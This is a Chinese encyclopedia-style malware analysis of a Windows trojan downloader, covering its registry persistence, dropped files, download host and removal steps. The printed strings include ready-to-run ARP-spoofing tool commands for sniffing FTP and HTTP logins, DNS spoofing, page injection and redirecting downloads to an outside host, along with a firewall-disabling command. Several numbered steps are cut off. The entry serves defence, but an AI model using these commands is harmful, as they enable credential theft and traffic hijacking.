Trojan-Downloader.Win32.Agent.bmp

Trojan-Downloader.Win32.Agent.bmp一種病毒的名稱,病毒類型: 木馬

基本介紹

  • 外文名:Trojan-Downloader.Win32.Agent.bmp
  • 公開範圍:完全公開
  • 危害等級:5
  • 感染系統: windows98以上版本
基本信息,相關信息,

基本信息

檔案 MD5: E2C32E4E0CD6205C4654C98C152EAB6E
公開範圍: 完全公開
危害等級: 5
檔案長度: 45,233 位元組
感染系統: windows98以上版本
開發工具:  病毒描述:
該病毒屬木馬類 ARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "Mick"="C:\WINDOWS\system32\softmuma.exe"
3 、修改系統時間為:
2002 年 3 月 3 日 19 點 02 分

相關信息

、感染 htm/asp/php 檔案, 文本檔案,以記錄相關信息:
"c:/"
"C:\Program Files\NetMeeting\c.txt"
"d:/"
"C:\Program Files\NetMeeting\d.txt"
"e:/"
"C:\Program Files\NetMeeting\e.txt"
"f:/"
"C:\Program Files\NetMeeting\f.txt"
"g:/"
"C:\Program Files\NetMeeting\g.txt"
6 、 關閉系統防火牆服務,以降低系統安全性能:
在後台打開 cmd 用命令 c net stop sharedaccess 關閉系統防火牆服務
7 、指定註冊表啟動項,但未全部執行:
"Software\Microsoft\Windows\CurrentVersion\Run"
"c:\windows\1.exe"
"c:\windows\2.exe"
"c:\windows\3.exe"
"c:\windows\4.exe"
"c:\windows\5.exe"
"c:\windows\6.exe"
"c:\windows\7.exe"
"c:\windows\8.exe"
"c:\windows\9.exe"
"c:\windows\10.exe"
"c:\windows\11.exe"
"c:\windows\12.exe"
"c:\windows\13.exe"
"c windows\14.exe"
"c:\windows\15.exe"
"c:\windows\16.exe"
8 、連線網路,下載病毒檔案到本機運行:
IP : 59.34.198.33( 廣東省湛江市 電信 )
域名: 0001.0168168.cn
下載地址: 0001.0168168.cn/1.exe
0001.0168168.cn/*.*
下載的病毒運行後衍生的檔案:
%WINDIR%\11.exe
%WINDIR%\13.exe
%WINDIR%\winform.exe
%system32%\dh2104.dll
%system32%\moyu103.dll
%system32%\msfeed.exe
%system32%\mydata.exe
%system32%\nwizdh.exe
%system32%\nwizqjsj.dll
%system32%\nwizqjsj.exe
%system32%\nwizzhuxians.dll
%system32%\nwizzhuxians.exe
%system32%\packet.dll
%system32%\ravasktao.dll
%system32%\ravasktao.exe
%system32%\sevices.exe
%system32%\softmuma.exe
%system32%\visin.exe
%system32%\wanpacket.dll
%system32%\winform.dll
%system32%\wpcap.dll
%system32%\ztinetzt.dll
%system32%\ztinetzt.exe
%system32%\drivers\npf.sys
%system32%\drivers\usbinte.sys
%Program Files%\Internet Explorer\PLUGINS\System64.Sys
%Temp%\rxso.exe
%Temp%\tlso.exe
%Temp%\wgso.exe
%Temp%\wlso.exe
%Temp%\woso.exe
9 、下載的病毒增加的註冊表啟動項:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
{754FB7D8-B8FE-4810-B363-A788CD060F1F}\InProcServer32
鍵值 : 字串 : "@"="C:\Program Files\Internet Explorer\PLUGINS\System64.Sys"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\
Installed Components\{11716107-A10D-11cf-64CD-11115FE1CF41}
鍵值 : 字串 : "StubPath"="C:\WINDOWS\system32\nwizzhuxians.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\
Installed Components\{6A202101-A04D-21cf-65CD-31FF5FE1CF20}
鍵值 : 字串 : "StubPath"="C:\WINDOWS\system32\mydata.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
policies\Explorer\Run
鍵值 : 字串 : "visin"="C:\WINDOWS\system32\visin.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : " Microsoft Autorun1"="C:\WINDOWS\system32\nwizdh.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : " Microsoft Autorun14"="C:\WINDOWS\system32\ztinetzt.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "Microsoft Autorun7"="C:\WINDOWS\system32\nwizqjsj.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "Microsoft Autorun9"="C:\WINDOWS\system32\Ravasktao.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "rxsa"="C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\rxso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "tlsa"="C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\tlso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "wgsa"="C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\wgso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "WinForm"="C:\WINDOWS\WinForm.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "wlsa"="C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\wlso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值 : 字串 : "wosa"="C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\woso.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NPF
鍵值 : 字串 : "ImagePath"="system32\drivers\npf.sys"
10 、該病毒下載的病毒可引起 DNS 欺騙:
Content-Encoding: Transfer-Encoding:
Content-Type: text/htmlHTTP/1.0
200HTTP/1.1 200DNS 欺騙 ( 修改應答包 )
%s -> %d.%d.%d.%d
DNS欺騙(構建應答包) %s -> %d.%d.%d.%d
pmac == NULL ??????
%d.%d.%d.%d -> %d.%d.%d.%d
[!] ProcessPacket -> send packet error. %d
[!] Forward thread send packet error
memory lack.
Scanning Alive Host......
%d: %15s %.2X-%.2X-%.2X-%.2X-%.2X-%.2X %s
Found Alive Host:
N/A[-] Get %s mac Error.
No interfaces found! Make sure WinPcap is installed.
Default Gateway . . : %s
Physical Address. . : %.2X-%.2X-%.2X-%.2X-%.2X-%.2X
%d. %s
IP Address. . . . . : %s
Error in pcap_findalldevs: %s
[*] Bind on %s %s...
Unable to open the adapter.%s is not supported by WinPcap
Bye!
Restoring the ARPTable......
Killing the SpoofThread......
Ctrl+C Is Pressed.
options:
-idx [index] 網卡索引號
-ip [ip] 欺騙的IP,用'-'指定範圍,','隔開
-sethost [ip] 默認是網關,可以指定別的IP
-port [port] 關注的連線埠,用'-'指定範圍,','隔開,沒指定默認關注所有連線埠
-reset 恢複目標機的ARP表
-hostname 探測主機時獲取主機名信息
-logfilter [string]設定保存數據的條件,必須+-_做前綴,後跟關鍵字,
','隔開關鍵字,多個條件'|'隔開 所有帶+前綴的關鍵字都出現的包則寫入
檔案 帶-前綴的關鍵字出現的包不寫入檔案 帶_前綴的關鍵字一個符合則寫入
檔案(如有+-條件也要符合)
-save_a [filename] 將捕捉到的數據寫入檔案 ACSII模式
-save_h [filename] HEX模式
-hacksite [ip] 指定要插入代碼的站點域名或IP, 多個可用','隔開,
沒指定則影響所有站點
-insert [html code]指定要插入html代碼
-postfix [string] 關注的後綴名,只關注HTTP/1.1 302
-hackURL 發現關注的後綴名後修改URL到新的URL
-filename [name] 新URL上有效的資源檔案名稱
-hackdns [string] DNS欺騙,只修改UDP的報文,多個可用','隔開 格式: 域名|IP,
www.aa.com|222.22.2.2,www.bb.com|1.1.1.1
-Interval [ms] 定時欺騙的時間間隔,單位:毫秒:默認是3000 ms
-spoofmode [1|2|3] 將數據騙發到本機,欺騙對象:1為網關,2為目標機,3為兩者(默認)
-speed [kb] 限制指定的IP或IP段的網路總頻寬,單位:KB
example: 嗅探指定的IP段中連線埠80的數據,並以HEX模式寫入檔案
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log
FTP嗅探,在21或2121連線埠中出現USER或PASS的數據包記錄到檔案
zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121
-spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log
HTTP web信箱登入或一些論壇登入的嗅探,根據情況自行改關鍵字
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80
-logfilter "+POST ,+user,+pass" -save_a sniff.log
用|添加嗅探條件,這樣FTP和HTTP的一些敏感關鍵字可以一起嗅探
zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter
"+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log
如果嗅探到目標下載檔案後綴是exe等則更改Location:為
http://xx.net/test.exe zxarps.exe
-idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30
-spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/
-filename test.exe
指定的IP段中的用戶訪問到-hacksite中的網址則只顯示
just for fun zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99
-port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun"
指定的IP段中的用戶訪問的所有網站都插入一個框架代碼
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert ""
指定的兩個IP的總頻寬限制到20KB
zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20
DNS欺騙 zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66
-hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"
註: % System% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System 資料夾的位置。
Windows2000/NT 中默認的安裝路徑是 C:\Winnt\System32 , windows95/98/me 中默認的安裝
路徑是 C:\Windows\System , windowsXP 中默認的安裝路徑是 C:\Windows\System32 。
清除方案:
1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )
2 、 手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1)使用 安天木馬防線 “進程管理”關閉病毒進程。
(2)刪除病毒檔案:
%system32%\softmuma.exe
%WINDIR%\11.exe
%WINDIR%\13.exe
%WINDIR%\winform.exe
%system32%\dh2104.dll
%system32%\moyu103.dll
%system32%\msfeed.exe
%system32%\mydata.exe
%system32%\nwizdh.exe
%system32%\nwizqjsj.dll
%system32%\nwizqjsj.exe
%system32%\nwizzhuxians.dll
%system32%\nwizzhuxians.exe
%system32%\packet.dll
%system32%\ravasktao.dll
%system32%\ravasktao.exe
%system32%\sevices.exe
%system32%\softmuma.exe
%system32%\visin.exe
%system32%\wanpacket.dll
%system32%\winform.dll
%system32%\wpcap.dll
%system32%\ztinetzt.dll
%system32%\ztinetzt.exe
%system32%\drivers\npf.sys
%system32%\drivers\usbinte.sys
%Program Files%\Internet Explorer\PLUGINS\System64.Sys
%Temp%\rxso.exe
%Temp%\tlso.exe
%Temp%\wgso.exe
%Temp%\wlso.exe
%Temp%\woso.exe
(3)恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : "Mick"="C:\WINDOWS\system32\softmuma.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{754FB7D8-
B8FE-4810-B363-A788CD060F1F}\InProcServer32
鍵值 : 字串 : "@"="C:\Program Files\Internet Explorer\
PLUGINS\System64.Sys"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\
Installed Components\
{11716107-A10D-11cf-64CD-11115FE1CF41}
鍵值 : 字串 :
"StubPath"="C:\WINDOWS\system32\nwizzhuxians.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\
Installed Components\
{6A202101-A04D-21cf-65CD-31FF5FE1CF20}
鍵值 : 字串 :
"StubPath"="C:\WINDOWS\system32\mydata.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run
鍵值 : 字串 : "visin"="C:\WINDOWS\system32\visin.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : " Microsoft Autorun1"=
"C:\WINDOWS\system32\nwizdh.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : " Microsoft Autorun14"=
"C:\WINDOWS\system32\ztinetzt.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : "Microsoft Autorun7"=
"C:\WINDOWS\system32\nwizqjsj.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : "Microsoft Autorun9"=
"C:\WINDOWS\system32\Ravasktao.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : "rxsa"=
"C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\rxso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 :"tlsa"=
"C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\tlso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : "wgsa"=
"C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\wgso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 : "WinForm"="C:\WINDOWS\WinForm.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 :"wlsa"=
"C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\wlso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
鍵值 : 字串 :  "wosa"=
"C:\DOCUME~1\COMMAN~1\LOCALS~1\Temp\woso.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NPF
鍵值 : 字串 : "ImagePath"="system32\drivers\npf.sys"

相關詞條

熱門詞條

聯絡我們